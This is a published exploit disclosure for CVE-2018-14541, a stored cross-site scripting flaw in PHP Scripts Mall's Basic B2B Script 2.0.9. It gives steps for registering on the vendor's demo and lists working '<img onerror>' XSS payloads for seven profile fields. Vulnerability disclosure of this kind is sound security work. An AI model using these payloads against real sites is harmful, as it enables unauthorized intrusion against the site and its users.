CVE-2018-14541 : PHP Scripts Mall Basic B2B Script 2.0.0 has Reflected and Stored XSS Vulnerability

*********************************
# Exploit Title: PHP Scripts Mall Basic B2B Script 2.0.9 has Stored XSS via the First name, Last name, Address 1, City, State, and Company name fields.
# Date: 20.07.2018
# Site Titel : B2B Script
# Vendor Homepage: https://www.phpscriptsmall.com/
#Vendor Software : https://www.phpscriptsmall.com/product/professional-b2b-script/
# Software Link: http://readymadeb2bscript.com/basic-b2b/
# Category: Web Application
# Version: 2.0.9
# Exploit Author: Vikas Chaudhary
# Contact: https://www.facebook.com/profile.php?id=100011287630308
# Web: https://gkaim.com/
#Published on : https://gkaim.com/cve-2018-14541-vikas-chaudhary/
# Tested on: Windows 10 -Firefox
# CVE- CVE-2018-14541

*******************************
Proof of Concept:-
————————–
1. Go to the site (https://www.phpscriptsmall.com/product/professional-b2b-script/ ) ,Select User Demo.
2- Click on Join Free => Fill the Form and Create an Account using your name email and soo on …
3- Goto your mail and Verify it.
4-Come back to site and Login using your Verified Mail and Password.
6- When loged in ,goto My Profile => Edit Profile and fill the these Scripts in given parameter.

in FIRST NAME => “><img src=x onerror=prompt(/VIKAS/)>
in LAST NAME => “><img src=x onerror=prompt(/CHAUDHARY/)>
in ADDRESS 1 => “><img src=x onerror=prompt(/MYAIM/)>
in ADDRESS 2 => “><img src=x onerror=prompt(/GKAIM/)>
in CITY => “><img src=x onerror=prompt(/HRDP/)>
in STATE => “><img src=x onerror=prompt(/ETHICAL/)>
in COMPANY NAME => “><img src=x onerror=prompt(/HACKER/)>

Now click on SUBMIT and refresh the page

You will having popup of /VIKAS/ , /CHAUDHARY/ , / MYAIM/ . /GKAIM/ , /HRDP/ , /ETHICAL/ , /HACKER/ in you account..

See on Exploit DB

Catch me on Github

Read Here all CVE